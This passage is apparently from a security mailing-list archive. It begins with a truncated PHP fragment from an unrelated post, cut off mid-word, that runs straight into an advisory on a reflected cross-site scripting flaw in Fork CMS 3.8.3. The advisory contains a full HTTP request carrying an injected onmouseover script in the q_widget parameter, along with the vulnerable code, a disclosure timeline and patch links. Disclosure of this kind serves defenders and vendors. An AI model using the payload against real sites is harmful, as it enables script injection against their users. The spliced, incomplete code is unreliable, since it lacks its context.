}
}
$to_return = array_unique($to_return);
return $to_return;
}
- Fix code:
public function get_children($parent_id = 0, $type = false,
$visible_on_frontend = false)
{
$categories_id = $parent_id =intval($parent_id);
$cache_group = 'categories/' . $categories_id;
$table = $this->tables['categories'];
$db_t_content = $this->tables['content'];
if (isset($orderby) == false) {
$orderby = array();
//$orderby[0] = 'updated_on';
//$orderby[1] = 'DESC';
$orderby[0] = 'position';
$orderby[1] = 'asc';
}
if (intval($parent_id) == 0) {
return false;
}
$data = array();
$data['parent_id'] = $parent_id;
if ($type != FALSE) {
$data['data_type'] = $type;
} else {
$type = 'category_item';
$data['data_type'] = $type;
}
$cache_group = 'categories/' . $parent_id;
$q = " SELECT id, parent_id FROM $table WHERE
parent_id=$parent_id ";
$q_cache_id = __FUNCTION__ . crc32($q);
$save = $this->app->db->query($q, $q_cache_id,
$cache_group);
if (empty($save)) {
return false;
}
$to_return = array();
if (is_array($save) and !empty($save)) {
fore
[FD] XSS Vulnerability in Fork CMS 3.8.3
# Exploit Title: XSS Vulnerability in Fork CMS 3.8.3
# Google Dork: N/A
# Date: 12/26/2014
# Exploit Author: Le Ngoc phi (phi.n...@itas.vn) and ITAS Team (www.itas.vn)
# Vendor Homepage: http://www.fork-cms.com
# Software Link: http://www.fork-cms.com/blog/detail/fork-3.8.4-released
# Version: Fork 3.8.3
# Tested on: N/A
# CVE : CVE-2014-9470
::VULNERABILITY DETAIL::
- Vulnerable parameter: q_widget
- Vulnerable file: src/Frontend/Modules/Search/Actions/Index.php
- Vulnerable function: loadForm()
- Attack vector:
GET
/en/search?form=search&q_widget="onmouseover="alert('XSS')"&submit=Search
HTTP/1.1
Host: forkcms.local
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101
Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B;
__utma=23748525.1232410121.1415937482.1419392332.1419480017.3;
__utmz=23748525.1419480017.3.3.utmcsr=google|utmccn=(organic)|utmcmd=organic
|utmctr=(not%20provided);
track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B;
frontend_language=s%3A2%3A%22en%22%3B; _ga=GA1.2.1232410121.1415937482;
PHPSESSID=gailpg881ubvtsmroh2p1bfqn5
Connection: keep-alive
- Vulnerable code:
private function loadForm()
{
// create form
$this->frm = new FrontendForm('search', null, 'get', null, false);
// could also have been submitted by our widget
if (!\SpoonFilter::getGetValue('q', null, '')) {
$_GET['q'] = \SpoonFilter::getGetValue('q_widget', null, '');
}
// create elements
$this->frm->addText(
'q',
null,
255,
'inputText liveSuggest autoComplete',
'inputTextError liveSuggest autoComplete'
);
// since we know the term just here we should set the canonical url
here
$canonicalUrl = SITE_URL .
FrontendNavigation::getURLForBlock('Search');
if (isset($_GET['q']) && $_GET['q'] != '') {
$canonicalUrl .= '?q=' . $_GET['q'];
}
$this->header->setCanonicalUrl($canonicalUrl);
}
::DISCLOSURE::
- 12/25/2014: Detected vulnerability
- 12/25/2014: Inform vendor and the vendor confirmed
- 12/26/2014: Vendor releases patch
- 12/26/2014: ITAS Team publishes information
::REFERENCE::
-
http://www.itas.vn/news/itas-team-found-out-a-cross-site-scripting-vulnerabi
lity-in-fork-cms-70.html
- https://github.com/forkcms/forkcms/issues/1018s
-
https://github.com/forkcms/forkcms/commit/4a7814762adf4f56f932d95146c7e4126d
872114
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION
OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS,
AND AT THE USER'S OWN RISK.
ITAS Team
ITAS Corp. Be protected with us
Office : 24 Dang Thai Mai St., Ward 7, Phu Nhuan District, HCMC.
Tel : +84 - 8 - 38931952 Hotline :
0903445711
Email : <mailto:i...@itas.vn> i...@itas.vn
<http://www.itas.vn/> www.itas.vn
___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
